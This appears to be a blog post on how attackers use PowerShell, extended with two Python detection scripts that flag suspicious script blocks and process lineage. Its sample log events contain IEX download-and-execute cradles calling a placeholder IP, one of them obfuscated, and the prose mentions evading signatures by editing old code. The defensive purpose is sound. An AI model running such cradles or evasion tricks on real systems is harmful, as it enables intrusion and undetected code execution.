PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.
Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet, which can be used to run an executable, and the Invoke-Command cmdlet, which runs a command locally or on a remote computer. PowerShell may also be used to download and run executables from the internet, which can be executed from disk or in memory without touching the disk (more on this below).
Administrator permissions are required to use PowerShell to connect to remote systems.
A number of PowerShell-based offensive testing tools are available, including Empire, PowerSploit, and PSAttack.
PowerShell commands and scripts can also be executed without directly invoking the powershell.exe binary, through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET Framework and the Windows Common Language Interface (CLI).
Some well-known tools that build on PowerShell are Empire, PowerSploit, PSAttack, Cobalt Strike, Mimikatz, BloodHound and Unicorn, among others.
So, as we can see, PowerShell is a great offensive (and defensive) tool that can help us in various forms of attack, and it doesn't stop there: it can also run code in memory (demonstrated below).
The possibilities here are almost endless. Can we enumerate? These commands can also be run from CMD, but with PowerShell we get more information and can ask only for the specific details we are interested in.
Basic user enumeration
What about execution? Just typing the executable name should be enough, since calc is on the PATH of PowerShell's environment.
Executing calculator
What processes are running, and who owns them?
Get-Process -IncludeUserName
Let's call a shell in memory. It runs as soon as it grabs it from the server, without saving anything to disk. IEX = Invoke-Expression
IEX Memory Execution without touching Disk
Can we shorten this? Of course: let's put all of this into variables. Since PowerShell is a scripting language, you can create variables for the pieces of this long line and add them together.
Can we go even shorter?
And Yes!
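The in-memory IEX pattern above, and the variable trick that shortens it, are exactly what PowerShell Script Block Logging (Event ID 4104) records on the defender's side. The following Python is an added example, not code from the original post: it runs a few simple rules over constructed sample script-block text (the event records, host names and URLs are made up for the illustration) and ranks the events the way a blue team would triage them.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample records in the shape of PowerShell Script Block Logging
# events (Event ID 4104 in Microsoft-Windows-PowerShell/Operational). Script
# text, host names and URLs are illustrative, not real captures.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"id": 1, "host": "WS01",
     "text": "Get-Process -IncludeUserName | Sort-Object CPU -Descending | Select-Object -First 5"},
    {"id": 2, "host": "WS01",
     "text": "Invoke-WebRequest -Uri 'https://example.invalid/notes.txt' -OutFile notes.txt"},
    {"id": 3, "host": "WS02",
     "text": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/run.ps1')"},
    {"id": 4, "host": "WS02",
     "text": "$a='Net.Web'; $b='Client'; $c=New-Object ($a+$b); IEX $c.DownloadString('http://203.0.113.10/x')"},
    {"id": 5, "host": "WS03",
     "text": "iwr http://203.0.113.10/p.ps1 -UseBasicParsing | iex"},
]

# Each rule captures one observable. None of them is a verdict on its own;
# the combination is what matters.
RULES = {
    # Content being pulled from the network into the session.
    "download_primitive": re.compile(
        r"DownloadString|DownloadFile|DownloadData|Net\.WebClient"
        r"|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b", re.IGNORECASE),
    # Text being turned into code at run time (IEX is the alias).
    "dynamic_execution": re.compile(r"Invoke-Expression|\biex\b", re.IGNORECASE),
    # Short quoted fragments or variables glued together with '+', the
    # "shorten it with variables" trick shown above.
    "string_assembly": re.compile(
        r"""(?:['"][^'"]{1,16}['"]|\$\w+)\s*\+\s*(?:['"][^'"]{1,16}['"]|\$\w+)"""),
}

SEVERITY_RANK = {"high": 0, "medium": 1, "low": 2, "info": 3}


def classify(script_text: str) -> Dict[str, object]:
    """Evaluate one script block and return the rule hits plus a severity."""
    hits = {name: bool(rx.search(script_text)) for name, rx in RULES.items()}
    # Network content handed straight to the interpreter is the in-memory
    # pattern: nothing is written to disk for file-based controls to inspect.
    cradle = hits["download_primitive"] and hits["dynamic_execution"]
    if cradle:
        severity = "high"
    elif hits["dynamic_execution"]:
        severity = "medium"   # IEX alone is rare in reviewed administrative scripts
    elif hits["download_primitive"]:
        severity = "low"      # downloads to disk are common and easy to verify
    else:
        severity = "info"
    return {
        **hits,
        "in_memory_cradle": cradle,
        "obfuscated_cradle": cradle and hits["string_assembly"],
        "severity": severity,
    }


def triage(events: List[Dict[str, object]]) -> List[Tuple[int, str, str]]:
    """Return (event id, host, severity) for everything above 'info',
    most severe first, so an analyst reads the cradles before the downloads."""
    scored = [(int(e["id"]), str(e["host"]), str(classify(str(e["text"]))["severity"]))
              for e in events]
    flagged = [s for s in scored if s[2] != "info"]
    return sorted(flagged, key=lambda s: (SEVERITY_RANK[s[2]], s[0]))


if __name__ == "__main__":
    for event_id, host, severity in triage(SAMPLE_EVENTS):
        print(f"{severity:<6} event {event_id} on {host}")
```

Two points worth knowing when tuning this: Script Block Logging records each script block as it is compiled, so when IEX evaluates a string assembled from variables, the joined text is logged as its own follow-on 4104 event in clear, which is why the split variant (event 4) does not escape the rules. And the download primitive on its own (event 2) is deliberately scored low: writing a file to disk is ordinary administration and leaves an artifact that other controls can inspect.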
Let's try downloading a file
Other frameworks also work with PowerShell; Empire alone holds more than 200 PowerShell modules.
As PowerShell is an entire subject in itself, the above were a couple of demonstrations of how incredibly useful it can be for red teams as well as blue teams. At the time of writing, even though PowerShell has a lot to offer, it is dying out in real-world engagements because of how heavily it is monitored. Some ways to move on are learning the .NET Framework, C# and C++; a quick and dirty approach is to edit old code so that the executed file gets a new signature. But remember: even if it isn't caught at the foothold stage, it can be caught during post-exploitation, since it is still calling or creating processes that are odd enough to get noticed. An excellent list of CMD commands and their respective PowerShell equivalents is also available.
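The closing point, that PowerShell activity still shows up in process creation even when the script itself is never caught, and the earlier note that the engine can run through System.Management.Automation without powershell.exe, can both be checked from endpoint telemetry. This added Python example (not from the original post) applies lineage rules to constructed Sysmon-style process-creation and image-load records; the parent and child lists, paths and event contents are assumptions for the illustration and need tuning per environment.

```python
from dataclasses import dataclass
from typing import List


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record, in the shape of Sysmon Event ID 1
    (or Security Event ID 4688 with command-line auditing enabled)."""
    image: str          # full path of the new process
    parent_image: str   # full path of the process that created it
    command_line: str


@dataclass(frozen=True)
class ImageLoadEvent:
    """One module-load record, in the shape of Sysmon Event ID 7."""
    image: str          # process that loaded the module
    image_loaded: str   # full path of the loaded DLL


POWERSHELL_HOSTS = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
# Document and browser applications rarely have a reason to start PowerShell;
# this list is an assumption for the example and needs tuning per environment.
UNUSUAL_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                   "msedge.exe", "chrome.exe", "firefox.exe"}
# Children PowerShell starts by itself in normal use (console host, nested hosts).
EXPECTED_CHILDREN = {"conhost.exe"} | POWERSHELL_HOSTS
# WinRM plug-in host that runs the target side of Invoke-Command / Enter-PSSession.
REMOTING_HOST = "wsmprovhost.exe"
# The engine assembly; a process that loads it can run PowerShell with no
# powershell.exe in the process tree at all.
ENGINE_ASSEMBLY_PREFIX = "system.management.automation"


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def assess_process(evt: ProcessEvent) -> List[str]:
    """Lineage observations for one process-creation event."""
    image, parent = basename(evt.image), basename(evt.parent_image)
    findings = []
    if image in POWERSHELL_HOSTS and parent in UNUSUAL_PARENTS:
        findings.append("powershell_from_unusual_parent")
    if parent == REMOTING_HOST:
        # Whatever ran here was launched from a remote PowerShell session.
        findings.append("spawned_inside_remote_session")
    if parent in POWERSHELL_HOSTS and image not in EXPECTED_CHILDREN:
        # Start-Process, or just typing an executable name, lands here.
        findings.append("unexpected_child_of_powershell")
    return findings


def assess_image_load(evt: ImageLoadEvent) -> List[str]:
    """Flag the PowerShell engine hosted by something other than a PowerShell host."""
    if (basename(evt.image_loaded).startswith(ENGINE_ASSEMBLY_PREFIX)
            and basename(evt.image) not in POWERSHELL_HOSTS):
        return ["powershell_engine_in_non_powershell_host"]
    return []


# Constructed sample telemetry (paths and command lines are made up).
PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_PROCESS_EVENTS = [
    ProcessEvent(PS_EXE, r"C:\Windows\explorer.exe", "powershell.exe"),
    ProcessEvent(PS_EXE, r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE", "powershell.exe"),
    ProcessEvent(r"C:\Windows\System32\calc.exe", PS_EXE, "calc"),
    ProcessEvent(r"C:\Windows\System32\whoami.exe", r"C:\Windows\System32\wsmprovhost.exe", "whoami /all"),
    ProcessEvent(r"C:\Windows\System32\conhost.exe", PS_EXE, "conhost.exe 0x4"),
]
ENGINE_DLL = r"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\System.Management.Automation.dll"
SAMPLE_IMAGE_LOADS = [
    ImageLoadEvent(PS_EXE, ENGINE_DLL),
    ImageLoadEvent(r"C:\Windows\System32\rundll32.exe", ENGINE_DLL),
]


if __name__ == "__main__":
    for evt in SAMPLE_PROCESS_EVENTS:
        print(basename(evt.parent_image), "->", basename(evt.image), assess_process(evt))
    for evt in SAMPLE_IMAGE_LOADS:
        print(basename(evt.image), "loads engine:", assess_image_load(evt))
```

The image-load rule is the one that covers execution through System.Management.Automation: legitimate management software does host the engine too, so in practice that rule needs an allowlist of known hosts rather than the bare check shown here. The remoting rule works because the target side of Invoke-Command runs inside wsmprovhost.exe, so anything it spawns carries that parent regardless of how the command was written.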